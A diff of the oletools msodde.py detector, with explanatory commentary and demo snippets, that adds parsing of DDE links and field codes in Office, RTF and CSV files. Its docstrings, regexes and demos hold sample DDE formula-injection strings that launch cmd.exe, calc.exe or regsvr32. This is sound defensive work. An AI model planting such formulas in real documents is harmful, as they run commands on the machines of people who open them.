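Because the blacklist mode is the default, a plain `msodde file.docx` run reports every field except the known-harmless ones, while `-d` narrows the output to DDE/DDEAUTO only.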
# banner to be printed at program start
BANNER = """msodde %s - http://decalage.info/python/oletools
@@ -98,11 +229,13 @@
Please report any issue at https://github.com/decalage2/oletools/issues
""" % __version__
-BANNER_JSON = dict(type='meta', version=__version__, name='msodde',
- link='http://decalage.info/python/oletools',
- message='THIS IS WORK IN PROGRESS - Check updates regularly! '
- 'Please report any issue at '
- 'https://github.com/decalage2/oletools/issues')
+# === LOGGING =================================================================
+
+DEFAULT_LOG_LEVEL = "warning" # Default log level
+
+# a global logger object used for debugging:
+logger = log_helper.get_or_create_silent_logger('msodde')
+
# === ARGUMENT PARSING =======================================================
@@ -122,11 +255,39 @@ def existing_file(filename):
def process_args(cmd_line_args=None):
- parser = ArgParserWithBanner(description='A python tool to detect and extract DDE links in MS Office files')
+ """ parse command line arguments (given ones or per default sys.argv) """
+ parser = ArgParserWithBanner(description='A python tool to detect and '
+ 'extract DDE links in MS Office files')
parser.add_argument("filepath", help="path of the file to be analyzed",
type=existing_file, metavar='FILE')
- parser.add_argument("--json", '-j', action='store_true',
- help="Output in json format")
+ parser.add_argument('-j', "--json", action='store_true',
+ help="Output in json format. Do not use with -l debug")
+ parser.add_argument("--nounquote", help="don't unquote values",
+ action='store_true')
+ parser.add_argument('-l', '--loglevel', dest="loglevel", action="store",
+ default=DEFAULT_LOG_LEVEL,
+ help="logging level debug/info/warning/error/critical "
+ "(default=%(default)s)")
+ parser.add_argument("-p", "--password", type=str, action='append',
+ help='if encrypted office files are encountered, try '
+ 'decryption with this password. May be repeated.')
+ filter_group = parser.add_argument_group(
+ title='Filter which OpenXML field commands are returned',
+ description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '
+ '(e.g. .doc). These options are mutually exclusive, last '
+ 'option found on command line overwrites earlier ones.')
+ filter_group.add_argument('-d', '--dde-only', action='store_const',
+ dest='field_filter_mode', const=FIELD_FILTER_DDE,
+ help='Return only DDE and DDEAUTO fields')
+ filter_group.add_argument('-f', '--filter', action='store_const',
+ dest='field_filter_mode',
+ const=FIELD_FILTER_BLACKLIST,
+ help='Return all fields except harmless ones')
+ filter_group.add_argument('-a', '--all-fields', action='store_const',
+ dest='field_filter_mode', const=FIELD_FILTER_ALL,
+ help='Return all fields, irrespective of their '
+ 'contents')
+ parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT)
return parser.parse_args(cmd_line_args)
@@ -134,29 +295,32 @@ def process_args(cmd_line_args=None):
# === FUNCTIONS ==============================================================
# from [MS-DOC], section 2.8.25 (PlcFld):
-# A field consists of two parts: field instructions and, optionally, a result. All fields MUST begin with
-# Unicode character 0x0013 with sprmCFSpec applied with a value of 1. This is the field begin
-# character. All fields MUST end with a Unicode character 0x0015 with sprmCFSpec applied with a value
-# of 1. This is the field end character. If the field has a result, then there MUST be a Unicode character
-# 0x0014 with sprmCFSpec applied with a value of 1 somewhere between the field begin character and
-# the field end character. This is the field separator. The field result is the content between the field
-# separator and the field end character. The field instructions are the content between the field begin
-# character and the field separator, if one is present, or between the field begin character and the field
-# end character if no separator is present. The field begin character, field end character, and field
-# separator are collectively referred to as field characters.
-
-
-def process_ole_field(data):
+# A field consists of two parts: field instructions and, optionally, a result.
+# All fields MUST begin with Unicode character 0x0013 with sprmCFSpec applied
+# with a value of 1. This is the field begin character. All fields MUST end
+# with a Unicode character 0x0015 with sprmCFSpec applied with a value of 1.
+# This is the field end character. If the field has a result, then there MUST
+# be a Unicode character 0x0014 with sprmCFSpec applied with a value of 1
+# somewhere between the field begin character and the field end character. This
+# is the field separator. The field result is the content between the field
+# separator and the field end character. The field instructions are the content
+# between the field begin character and the field separator, if one is present,
+# or between the field begin character and the field end character if no
+# separator is present. The field begin character, field end character, and
+# field separator are collectively referred to as field characters.
+
+
+def process_doc_field(data):
""" check if field instructions start with DDE
expects unicode input, returns unicode output (empty if not dde) """
- #print('processing field \'{0}\''.format(data))
+ logger.debug(u'processing field \'{0}\''.format(data))
if data.lstrip().lower().startswith(u'dde'):
- #print('--> is DDE!')
return data
- else:
- return u''
+ if data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'):
+ return data
+ return u''
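The field-character layout quoted from [MS-DOC] above (0x13 begin, 0x14 separator, 0x15 end, instructions between begin and separator) can be sketched as a tiny standalone state machine. This is a simplified model for illustration, not the patch's actual `process_doc_stream`:

```python
# Field characters from [MS-DOC] 2.8.25: begin, separator, end.
FIELD_START, FIELD_SEP, FIELD_END = 0x13, 0x14, 0x15

def extract_field_instructions(data):
    """Return the instruction part (begin..separator) of every field."""
    fields = []
    current = []        # bytes of the current field's instructions
    in_field = False
    past_sep = False
    for byte in data:   # iterating bytes yields ints on Python 3
        if byte == FIELD_START:
            in_field, past_sep, current = True, False, []
        elif byte == FIELD_END and in_field:
            fields.append(bytes(current).decode('ascii', 'replace'))
            in_field = False
        elif byte == FIELD_SEP:
            past_sep = True
        elif in_field and not past_sep:
            current.append(byte)
    return fields

stream = (bytes([FIELD_START]) + b'DDEAUTO c:\\cmd.exe'
          + bytes([FIELD_SEP]) + b'cached result' + bytes([FIELD_END]))
print(extract_field_instructions(stream))  # ['DDEAUTO c:\\cmd.exe']
```

The field result ("cached result") is deliberately dropped, matching the real code's interest in instructions only.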
OLE_FIELD_START = 0x13
@@ -165,11 +329,11 @@ def process_ole_field(data):
OLE_FIELD_MAX_SIZE = 1000 # max field size to analyze, rest is ignored
-def process_ole_stream(stream):
- """ find dde links in single ole stream
+def process_doc_stream(stream):
+ """ find dde links in single word ole stream
- since ole file stream are subclasses of io.BytesIO, they are buffered, so
- reading char-wise is not that bad performanc-wise """
+ since word ole file streams are subclasses of io.BytesIO, they are buffered,
+ so reading char-wise is not that bad performance-wise """
have_start = False
have_sep = False
@@ -180,16 +344,14 @@ def process_ole_stream(stream):
while True:
idx += 1
char = stream.read(1) # loop over every single byte
- if len(char) == 0:
+ if len(char) == 0: # pylint: disable=len-as-condition
break
else:
char = ord(char)
if char == OLE_FIELD_START:
- #print('DEBUG: have start at {}'.format(idx))
- #if have_start:
- # print("DEBUG: dismissing previous contents of length {}"
- # .format(len(field_contents)))
+ if have_start and max_size_exceeded:
+ logger.debug('big field was not a field after all')
have_start = True
have_sep = False
max_size_exceeded = False
@@ -200,117 +362,608 @@ def process_ole_stream(stream):
# now we are after start char but not at end yet
if char == OLE_FIELD_SEP:
- #print('DEBUG: have sep at {}'.format(idx))
+ if have_sep:
+ logger.debug('unexpected field: has multiple separators!')
have_sep = True
elif char == OLE_FIELD_END:
- #print('DEBUG: have end at {}'.format(idx))
-
# have complete field now, process it
- result_parts.append(process_ole_field(field_contents))
+ new_result = process_doc_field(field_contents)
+ if new_result:
+ result_parts.append(new_result)
# re-set variables for next field
have_start = False
have_sep = False
field_contents = None
elif not have_sep:
+ # we are only interested in the part from start to separator
# check that array does not get too long by accident
if max_size_exceeded:
pass
elif len(field_contents) > OLE_FIELD_MAX_SIZE:
- #print('DEBUG: exceeded max size')
+ logger.debug('field exceeds max size of {0}. Ignore rest'
+ .format(OLE_FIELD_MAX_SIZE))
max_size_exceeded = True
# appending a raw byte to a unicode string here. Not clean but
 # all we do later is check for the ascii-sequence 'DDE'...
+ elif char == 0: # may be a high-byte of a 2-byte codec
+ field_contents += unichr(char)
+ elif char in (10, 13):
+ field_contents += u'\n'
+ elif char < 32:
+ field_contents += u'?'
elif char < 128:
field_contents += unichr(char)
- #print('DEBUG: at idx {:4d}: add byte {} ({})'
- # .format(idx, unichr(char), char))
else:
field_contents += u'?'
- #print('DEBUG: at idx {:4d}: add byte ? ({})'
- # .format(idx, char))
- #print('\nstream len = {}'.format(idx))
- # copy behaviour of process_xml: Just concatenate unicode strings
- return u''.join(result_parts)
+ if max_size_exceeded:
+ logger.debug('big field was not a field after all')
+ logger.debug('Checked {0} characters, found {1} fields'
+ .format(idx, len(result_parts)))
+
+ return result_parts
-def process_ole_storage(ole):
- """ process a "directory" inside an ole stream """
- results = []
- for st in ole.listdir(streams=True, storages=True):
- st_type = ole.get_type(st)
- if st_type == olefile.STGTY_STREAM: # a stream
- stream = None
- links = ''
- try:
- stream = ole.openstream(st)
- #print('Checking stream {0}'.format(st))
- links = process_ole_stream(stream)
- except:
- raise
- finally:
- if stream:
- stream.close()
- if links:
- results.append(links)
- elif st_type == olefile.STGTY_STORAGE: # a storage
- #print('Checking storage {0}'.format(st))
- links = process_ole_storage(st)
- if links:
- results.extend(links)
- else:
- #print('Warning: unexpected type {0} for entry {1}. Ignore it'
- # .format(st_type, st))
- continue
- return results
+def process_doc(ole):
+ """
+ find dde links in word ole (.doc/.dot) file
-def process_ole(filepath):
- """ find dde links in ole file
+ Checks whether the file is ppt and returns empty immediately in that case
+ (ppt files cannot contain DDE-links to my knowledge)
like process_xml, returns a concatenated unicode string of dde links or
- empty if none were found. dde-links will still being with the dde[auto] key
+ empty if none were found. dde-links will still begin with the dde[auto] key
word (possibly after some whitespace)
"""
- #print('Looks like ole')
- ole = olefile.OleFileIO(filepath, path_encoding=None)
- text_parts = process_ole_storage(ole)
- return u'\n'.join(text_parts)
-
-
-def process_xml(filepath):
- z = zipfile.ZipFile(filepath)
- data = z.read('word/document.xml')
- z.close()
- # parse the XML data:
- root = ET.fromstring(data)
- text = u''
- # find all the tags 'w:instrText':
- # (each is a chunk of a DDE link)
- for elem in root.iter(TAG_W_INSTRTEXT):
- # concatenate the text of the field, if present:
- if elem.text is not None:
- text += elem.text
-
- for elem in root.iter(TAG_W_FLDSIMPLE):
- # concatenate the attribute of the field, if present:
- if elem.attrib is not None:
- text += elem.attrib[TAG_W_INSTRATTR]
-
- return text
-
-
-def process_file(filepath):
- """ decides to either call process_xml or process_ole """
- if olefile.isOleFile(filepath):
- return process_ole(filepath)
+ logger.debug('process_doc')
+ links = []
+ for sid, direntry in enumerate(ole.direntries):
+ is_orphan = direntry is None
+ if is_orphan:
+ # this direntry is not part of the tree --> unused or orphan
+ direntry = ole._load_direntry(sid)
+ is_stream = direntry.entry_type == olefile.STGTY_STREAM
+ logger.debug('direntry {:2d} {}: {}'
+ .format(sid, '[orphan]' if is_orphan else direntry.name,
+ 'is stream of size {}'.format(direntry.size)
+ if is_stream else
+ 'no stream ({})'.format(direntry.entry_type)))
+ if is_stream:
+ new_parts = process_doc_stream(
+ ole._open(direntry.isectStart, direntry.size))
+ links.extend(new_parts)
+
+ # mimic behaviour of process_docx: combine links to single text string
+ return u'\n'.join(links)
+
+
+def process_xls(filepath):
+ """ find dde links in excel ole file """
+
+ result = []
+ xls_file = None
+ try:
+ xls_file = xls_parser.XlsFile(filepath)
+ for stream in xls_file.iter_streams():
+ if not isinstance(stream, xls_parser.WorkbookStream):
+ continue
+ for record in stream.iter_records():
+ if not isinstance(record, xls_parser.XlsRecordSupBook):
+ continue
+ if record.support_link_type in (
+ xls_parser.XlsRecordSupBook.LINK_TYPE_OLE_DDE,
+ xls_parser.XlsRecordSupBook.LINK_TYPE_EXTERNAL):
+ result.append(record.virt_path.replace(u'\u0003', u' '))
+ return u'\n'.join(result)
+ finally:
+ if xls_file is not None:
+ xls_file.close()
+
+
+def process_docx(filepath, field_filter_mode=None):
+ """ find dde-links (and other fields) in Word 2007+ files """
+ parser = ooxml.XmlParser(filepath)
+ all_fields = []
+ level = 0
+ ddetext = u''
+ for _, subs, depth in parser.iter_xml(tags=TAG_W_P + TAG_W_FLDSIMPLE):
+ if depth == 0: # at end of subfile:
+ level = 0 # reset
+ if subs.tag in TAG_W_FLDSIMPLE:
+ # concatenate the attribute of the field, if present:
+ attrib_instr = subs.attrib.get(ATTR_W_INSTR[0]) or \
+ subs.attrib.get(ATTR_W_INSTR[1])
+ if attrib_instr is not None:
+ all_fields.append(unquote(attrib_instr))
+ continue
+
+ # have a TAG_W_P
+ for curr_elem in subs:
+ # check if w:r; parse children to pull out first FLDCHAR/INSTRTEXT
+ elem = None
+ if curr_elem.tag in TAG_W_R:
+ for child in curr_elem:
+ if child.tag in TAG_W_FLDCHAR or \
+ child.tag in TAG_W_INSTRTEXT:
+ elem = child
+ break
+ if elem is None:
+ continue # no fldchar or instrtext in this w:r
+ else:
+ elem = curr_elem
+ if elem is None:
+ raise ooxml.BadOOXML(filepath,
+ 'Got "None"-Element from iter_xml')
+
+ # check if FLDCHARTYPE and whether "begin" or "end" tag
+ attrib_type = elem.attrib.get(ATTR_W_FLDCHARTYPE[0]) or \
+ elem.attrib.get(ATTR_W_FLDCHARTYPE[1])
+ if attrib_type is not None:
+ if attrib_type == "begin":
+ level += 1
+ if attrib_type == "end":
+ level -= 1
+ if level in (0, -1): # edge-case; level gets -1
+ all_fields.append(ddetext)
+ ddetext = u''
+ level = 0 # reset edge-case
+
+ # concatenate the text of the field, if present:
+ if elem.tag in TAG_W_INSTRTEXT and elem.text is not None:
+ # expand field code if QUOTED
+ ddetext += unquote(elem.text)
+
+ # apply field command filter
+ logger.debug('filtering with mode "{0}"'.format(field_filter_mode))
+ if field_filter_mode in (FIELD_FILTER_ALL, None):
+ clean_fields = all_fields
+ elif field_filter_mode == FIELD_FILTER_DDE:
+ clean_fields = [field for field in all_fields
+ if FIELD_DDE_REGEX.match(field)]
+ elif field_filter_mode == FIELD_FILTER_BLACKLIST:
+ # check if fields are acceptable and should not be returned
+ clean_fields = [field for field in all_fields
+ if not field_is_blacklisted(field.strip())]
+ else:
+ raise ValueError('Unexpected field_filter_mode: "{0}"'
+ .format(field_filter_mode))
+
+ return u'\n'.join(clean_fields)
+
+
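The `level` bookkeeping in `process_docx` above (each `begin` fldChar increments, each `end` decrements, and a field is emitted when the level returns to zero, so nested fields collapse into one result) can be illustrated with a simplified token model. The names below are hypothetical, and the real code additionally handles the `-1` edge case and `w:instrText` extraction:

```python
def collect_fields(tokens):
    """tokens are ('begin',), ('end',) or ('text', s); nested fields are
    concatenated into a single result, like the level counter above."""
    fields, buf, level = [], '', 0
    for tok in tokens:
        if tok[0] == 'begin':
            level += 1
        elif tok[0] == 'end':
            level -= 1
            if level <= 0:          # outermost field closed
                fields.append(buf)
                buf, level = '', 0
        elif tok[0] == 'text' and level > 0:
            buf += tok[1]
    return fields

tokens = [('begin',), ('text', 'DDEAUTO cmd '), ('end',),
          ('text', 'plain paragraph text'),
          ('begin',), ('text', 'HYPERLINK x'), ('end',)]
print(collect_fields(tokens))  # ['DDEAUTO cmd ', 'HYPERLINK x']
```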
+def unquote(field):
+ """TODO: document what exactly is happening here..."""
+ if "QUOTE" not in field or NO_QUOTES:
+ return field
+ # split into components
+ parts = field.strip().split(" ")
+ ddestr = ""
+ for part in parts[1:]:
+ try:
+ character = chr(int(part))
+ except ValueError:
+ character = part
+ ddestr += character
+ return ddestr
+
+
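The `unquote` helper above expands Word's QUOTE field construct, in which characters can be hidden as decimal numbers. A self-contained version of the same decoding:

```python
def expand_quote(field):
    """'QUOTE 68 68 69' -> 'DDE': numeric parts become chars, others pass through."""
    out = ''
    for part in field.strip().split(' ')[1:]:  # skip the 'QUOTE' keyword
        try:
            out += chr(int(part))
        except ValueError:
            out += part                        # non-numeric part kept as-is
    return out

print(expand_quote('QUOTE 68 68 69 65 85 84 79'))  # DDEAUTO
```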
+# "static variables" for field_is_blacklisted:
+FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+')
+FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST)
+FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$')
+
+
+def field_is_blacklisted(contents):
+ """ Check if given field contents matches any in FIELD_BLACKLIST
+
+ A complete parser of field contents would be really complicated, so this
+ function has to make a trade-off. There may be valid constructs that this
+ simple parser cannot comprehend. Most arguments are not tested for validity
+ since that would make this test much more complicated. However, if this
+ parser accepts some field contents, then office is very likely to not
+ complain about it, either.
+ """
+
+ # split contents into "words", (e.g. 'bla' or '\s' or '"a b c"' or '""')
+ words = FIELD_WORD_REGEX.findall(contents)
+ if not words:
+ return False
+
+ # check if first word is one of the commands on our blacklist
+ try:
+ index = FIELD_BLACKLIST_CMDS.index(words[0].lower())
+ except ValueError: # first word is no blacklisted command
+ return False
+ logger.debug(u'trying to match "{0}" to blacklist command {1}'
+ .format(contents, FIELD_BLACKLIST[index]))
+ _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \
+ = FIELD_BLACKLIST[index]
+
+ # check number of args
+ nargs = 0
+ for word in words[1:]:
+ if word[0] == '\\': # note: words can never be empty, but can be '""'
+ break
+ nargs += 1
+ if nargs < nargs_required:
+ logger.debug(u'too few args: found {0}, but need at least {1} in "{2}"'
+ .format(nargs, nargs_required, contents))
+ return False
+ if nargs > nargs_required + nargs_optional:
+ logger.debug(u'too many args: found {0}, but need at most {1}+{2} in '
+ u'"{3}"'
+ .format(nargs, nargs_required, nargs_optional, contents))
+ return False
+
+ # check switches
+ expect_arg = False
+ arg_choices = []
+ for word in words[1+nargs:]:
+ if expect_arg: # this is an argument for the last switch
+ if arg_choices and (word not in arg_choices):
+ logger.debug(u'Found invalid switch argument "{0}" in "{1}"'
+ .format(word, contents))
+ return False
+ expect_arg = False
+ arg_choices = [] # in general, do not enforce choices
+ continue # "no further questions, your honor"
+ elif not FIELD_SWITCH_REGEX.match(word):
+ logger.debug(u'expected switch, found "{0}" in "{1}"'
+ .format(word, contents))
+ return False
+ # we want a switch and we got a valid one
+ switch = word[1]
+
+ if switch in sw_solo:
+ pass
+ elif switch in sw_with_arg:
+ expect_arg = True # next word is interpreted as arg, not switch
+ elif switch == '#' and 'numeric' in sw_format:
+ expect_arg = True # next word is numeric format
+ elif switch == '@' and 'datetime' in sw_format:
+ expect_arg = True # next word is date/time format
+ elif switch == '*':
+ expect_arg = True # next word is format argument
+ arg_choices += ['CHARFORMAT', 'MERGEFORMAT'] # always allowed
+ if 'string' in sw_format:
+ arg_choices += ['Caps', 'FirstCap', 'Lower', 'Upper']
+ if 'numeric' in sw_format:
+ arg_choices = [] # too many choices to list them here
+ else:
+ logger.debug(u'unexpected switch {0} in "{1}"'
+ .format(switch, contents))
+ return False
+
+ # if nothing went wrong so far, the contents seem to match the blacklist
+ return True
+
+
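`FIELD_WORD_REGEX` above tokenizes field contents into quoted strings or whitespace-free words, and `FIELD_SWITCH_REGEX` recognizes switches like `\l`. A quick demonstration of both patterns:

```python
import re

FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+')
FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$')

words = FIELD_WORD_REGEX.findall(r'HYPERLINK "http://a b" \l "anchor"')
print(words)  # ['HYPERLINK', '"http://a b"', '\\l', '"anchor"']

# only the '\l' token qualifies as a switch:
print([bool(FIELD_SWITCH_REGEX.match(w)) for w in words])
# [False, False, True, False]
```

Note how the quoted alternative keeps `"http://a b"` together even though it contains a space.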
+def process_xlsx(filepath):
+ """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """
+ dde_links = []
+ parser = ooxml.XmlParser(filepath)
+ for _, elem, _ in parser.iter_xml():
+ tag = elem.tag.lower()
+ if tag == 'ddelink' or tag.endswith('}ddelink'):
+ # we have found a dde link. Try to get more info about it
+ link_info = []
+ if 'ddeService' in elem.attrib:
+ link_info.append(elem.attrib['ddeService'])
+ if 'ddeTopic' in elem.attrib:
+ link_info.append(elem.attrib['ddeTopic'])
+ dde_links.append(u' '.join(link_info))
+
+ # binary parts, e.g. contained in .xlsb
+ for subfile, content_type, handle in parser.iter_non_xml():
+ try:
+ logger.info('Parsing non-xml subfile {0} with content type {1}'
+ .format(subfile, content_type))
+ for record in xls_parser.parse_xlsb_part(handle, content_type,
+ subfile):
+ logger.debug('{0}: {1}'.format(subfile, record))
+ if isinstance(record, xls_parser.XlsbBeginSupBook) and \
+ record.link_type == \
+ xls_parser.XlsbBeginSupBook.LINK_TYPE_DDE:
+ dde_links.append(record.string1 + ' ' + record.string2)
+ except Exception as exc:
+ if content_type.startswith('application/vnd.ms-excel.') or \
+ content_type.startswith('application/vnd.ms-office.'): # pylint: disable=bad-indentation
+ # should really be able to parse these either as xml or records
+ log_func = logger.warning
+ elif content_type.startswith('image/') or content_type == \
+ 'application/vnd.openxmlformats-officedocument.' + \
+ 'spreadsheetml.printerSettings':
+ # understandable that these are not record-based
+ log_func = logger.debug
+ else: # default
+ log_func = logger.info
+ log_func('Failed to parse {0} of content type {1} ("{2}")'
+ .format(subfile, content_type, str(exc)))
+ # in any case: continue with next
+
+ return u'\n'.join(dde_links)
+
+
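The namespace-tolerant `ddelink` tag matching in `process_xlsx` can be reproduced with the standard library alone (synthetic XML with hypothetical attribute values):

```python
import xml.etree.ElementTree as ET

XML_DATA = ('<externalLink xmlns='
            '"http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
            '<ddeLink ddeService="cmd" ddeTopic="/k calc.exe"/>'
            '</externalLink>')

links = []
for elem in ET.fromstring(XML_DATA).iter():
    tag = elem.tag.lower()
    if tag == 'ddelink' or tag.endswith('}ddelink'):  # with or without namespace
        info = [elem.attrib[key] for key in ('ddeService', 'ddeTopic')
                if key in elem.attrib]
        links.append(' '.join(info))
print(links)  # ['cmd /k calc.exe']
```

ElementTree prefixes element tags with `{namespace}`, which is why the `endswith('}ddelink')` check is needed; unprefixed attributes keep their plain names.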
+class RtfFieldParser(rtfobj.RtfParser):
+ """
+ Specialized RTF parser to extract fields such as DDEAUTO
+ """
+
+ def __init__(self, data):
+ super(RtfFieldParser, self).__init__(data)
+ # list of RtfObjects found
+ self.fields = []
+
+ def open_destination(self, destination):
+ if destination.cword == b'fldinst':
+ logger.debug('*** Start field data at index %Xh'
+ % destination.start)
+
+ def close_destination(self, destination):
+ if destination.cword == b'fldinst':
+ logger.debug('*** Close field data at index %Xh' % self.index)
+ logger.debug('Field text: %r' % destination.data)
+ # remove extra spaces and newline chars:
+ field_clean = destination.data.translate(None, b'\r\n').strip()
+ logger.debug('Cleaned Field text: %r' % field_clean)
+ self.fields.append(field_clean)
+
+ def control_symbol(self, matchobject):
+ # required to handle control symbols such as '\\'
+ # inject the symbol as-is in the text:
+ # TODO: handle special symbols properly
+ self.current_destination.data += matchobject.group()[1:2]
+
+
+RTF_START = b'\x7b\x5c\x72\x74' # == b'{\rt' but does not mess up auto-indent
+
+
+def process_rtf(file_handle, field_filter_mode=None):
+ """ find dde links or other fields in rtf file """
+ all_fields = []
+ data = RTF_START + file_handle.read() # read complete file into memory!
+ file_handle.close()
+ rtfparser = RtfFieldParser(data)
+ rtfparser.parse()
+ all_fields = [field.decode('ascii') for field in rtfparser.fields]
+ # apply field command filter
+ logger.debug('found {1} fields, filtering with mode "{0}"'
+ .format(field_filter_mode, len(all_fields)))
+ if field_filter_mode in (FIELD_FILTER_ALL, None):
+ clean_fields = all_fields
+ elif field_filter_mode == FIELD_FILTER_DDE:
+ clean_fields = [field for field in all_fields
+ if FIELD_DDE_REGEX.match(field)]
+ elif field_filter_mode == FIELD_FILTER_BLACKLIST:
+ # check if fields are acceptable and should not be returned
+ clean_fields = [field for field in all_fields
+ if not field_is_blacklisted(field.strip())]
else:
- return process_xml(filepath)
+ raise ValueError('Unexpected field_filter_mode: "{0}"'
+ .format(field_filter_mode))
+ return u'\n'.join(clean_fields)
+
+
+# threshold when to consider a csv file "small"; also used as sniffing size
+CSV_SMALL_THRESH = 1024
+
+# format of dde link: program-name | arguments ! unimportant
+# can be enclosed in "", prefixed with + or = or - or cmds like @SUM(...)
+CSV_DDE_FORMAT = re.compile(r'\s*"?[=+\-@](.+)\|(.+)!(.*)\s*')
+
+# allowed delimiters (python sniffer would use nearly any char). Taken from
+# https://data-gov.tw.rpi.edu/wiki/CSV_files_use_delimiters_other_than_commas
+CSV_DELIMITERS = ',\t ;|^'
+
+
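The `CSV_DDE_FORMAT` pattern splits a formula into program name, arguments and the (unimportant) remainder. Here is the match in isolation, with the `-` escaped inside the character class so it is not read as a `+`-to-`@` range:

```python
import re

DDE_FORMAT = re.compile(r'\s*"?[=+\-@](.+)\|(.+)!(.*)\s*')

match = DDE_FORMAT.match("=cmd|'/k calc.exe'!A1")
print(match.groups()[:2])  # ('cmd', "'/k calc.exe'")

print(DDE_FORMAT.match('just a normal cell'))  # None
```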
+def process_csv(filepath):
+ """ find dde in csv text
+
+ finds text parts like =cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'! or
+ =MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 [...]
+
+ Hoping here that the :py:class:`csv.Sniffer` determines quote and delimiter
+ chars the same way that excel does. Tested to some extent in unittests.
+
+ This can only find DDE-links, no other "suspicious" constructs (yet).
+
+ Cannot deal with unicode files yet (need more than just using uopen()).
+ """
+ results = []
+ if sys.version_info.major <= 2:
+ open_arg = dict(mode='rb')
+ else:
+ open_arg = dict(newline='')
+ with open(filepath, **open_arg) as file_handle:
+ # TODO: here we should not assume this is a file on disk, filepath can be a file object
+ results, dialect = process_csv_dialect(file_handle, CSV_DELIMITERS)
+ is_small = file_handle.tell() < CSV_SMALL_THRESH
+
+ if is_small and not results:
+ # easy to mis-sniff small files. Try different delimiters
+ logger.debug('small file, no results; try all delimiters')
+ file_handle.seek(0)
+ other_delim = CSV_DELIMITERS.replace(dialect.delimiter, '')
+ for delim in other_delim:
+ try:
+ file_handle.seek(0)
+ results, _ = process_csv_dialect(file_handle, delim)
+ except csv.Error: # e.g. sniffing fails
+ logger.debug('failed to csv-parse with delimiter {0!r}'
+ .format(delim))
+
+ if is_small and not results:
+ # try whole file as single cell, since sniffing fails in this case
+ logger.debug('last attempt: take whole file as single unquoted '
+ 'cell')
+ file_handle.seek(0)
+ match = CSV_DDE_FORMAT.match(file_handle.read(CSV_SMALL_THRESH))
+ if match:
+ results.append(u' '.join(match.groups()[:2]))
+
+ return u'\n'.join(results)
+
+
+def process_csv_dialect(file_handle, delimiters):
+ """ helper for process_csv: process with a specific csv dialect """
+ # determine dialect = delimiter chars, quote chars, ...
+ dialect = csv.Sniffer().sniff(file_handle.read(CSV_SMALL_THRESH),
+ delimiters=delimiters)
+ dialect.strict = False # microsoft is never strict
+ logger.debug('sniffed csv dialect with delimiter {0!r} '
+ 'and quote char {1!r}'
+ .format(dialect.delimiter, dialect.quotechar))
+
+ # rewind file handle to start
+ file_handle.seek(0)
+
+ # loop over all csv rows and columns
+ results = []
+ reader = csv.reader(file_handle, dialect)
+ for row in reader:
+ for cell in row:
+ # check if cell matches
+ match = CSV_DDE_FORMAT.match(cell)
+ if match:
+ results.append(u' '.join(match.groups()[:2]))
+ return results, dialect
+
+
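How the sniffing plus per-cell scan fits together can be tried on an in-memory sample (hypothetical data; the real function additionally retries with other delimiters for small files):

```python
import csv
import io
import re

SAMPLE = "name;value;formula\nfoo;1;=cmd|'/k calc.exe'!A1\n"

# let the sniffer pick the delimiter from the allowed set
dialect = csv.Sniffer().sniff(SAMPLE, delimiters=',\t ;|^')
print(dialect.delimiter)  # ';'

# then scan every cell for the DDE shape
dde_cell = re.compile(r'\s*"?[=+\-@].+\|.+!')
hits = [cell
        for row in csv.reader(io.StringIO(SAMPLE), dialect)
        for cell in row if dde_cell.match(cell)]
print(hits)  # ["=cmd|'/k calc.exe'!A1"]
```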
+#: format of dde formula in excel xml files
+XML_DDE_FORMAT = CSV_DDE_FORMAT
+
+
+def process_excel_xml(filepath):
+ """ find dde links in xml files created with excel 2003 or excel 2007+
+
+ TODO: did not manage to create dde-link in the 2007+-xml-format. Find out
+ whether this is possible at all. If so, extend this function
+ """
+ dde_links = []
+ parser = ooxml.XmlParser(filepath)
+ for _, elem, _ in parser.iter_xml():
+ tag = elem.tag.lower()
+ if tag != 'cell' and not tag.endswith('}cell'):
+ continue # we are only interested in cells
+ formula = None
+ for key in elem.keys():
+ if key.lower() == 'formula' or key.lower().endswith('}formula'):
+ formula = elem.get(key)
+ break
+ if formula is None:
+ continue
+ logger.debug(u'found cell with formula {0}'.format(formula))
+ match = re.match(XML_DDE_FORMAT, formula)
+ if match:
+ dde_links.append(u' '.join(match.groups()[:2]))
+ return u'\n'.join(dde_links)
+
+
+def process_file(filepath, field_filter_mode=None):
+ """ decides which of the process_* functions to call """
+ if olefile.isOleFile(filepath):
+ logger.debug('Is OLE. Checking streams to see whether this is xls')
+ if xls_parser.is_xls(filepath):
+ logger.debug('Process file as excel 2003 (xls)')
+ return process_xls(filepath)
+ if is_ppt(filepath):
+ logger.debug('is ppt - cannot have DDE')
+ return u''
+ logger.debug('Process file as word 2003 (doc)')
+ with olefile.OleFileIO(filepath, path_encoding=None) as ole:
+ return process_doc(ole)
+
+ with open(filepath, 'rb') as file_handle:
+ # TODO: here we should not assume this is a file on disk, filepath can be a file object
+ if file_handle.read(4) == RTF_START:
+ logger.debug('Process file as rtf')
+ return process_rtf(file_handle, field_filter_mode)
+
+ try:
+ doctype = ooxml.get_type(filepath)
+ logger.debug('Detected file type: {0}'.format(doctype))
+ except Exception as exc:
+ logger.debug('Exception trying to xml-parse file: {0}'.format(exc))
+ doctype = None
+
+ if doctype == ooxml.DOCTYPE_EXCEL:
+ logger.debug('Process file as excel 2007+ (xlsx)')
+ return process_xlsx(filepath)
+ if doctype in (ooxml.DOCTYPE_EXCEL_XML, ooxml.DOCTYPE_EXCEL_XML2003):
+ logger.debug('Process file as xml from excel 2003/2007+')
+ return process_excel_xml(filepath)
+ if doctype in (ooxml.DOCTYPE_WORD_XML, ooxml.DOCTYPE_WORD_XML2003):
+ logger.debug('Process file as xml from word 2003/2007+')
+ return process_docx(filepath, field_filter_mode)
+ if doctype is None:
+ logger.debug('Process file as csv')
+ return process_csv(filepath)
+ # could be docx; if not: this is the old default code path
+ logger.debug('Process file as word 2007+ (docx)')
+ return process_docx(filepath, field_filter_mode)
+
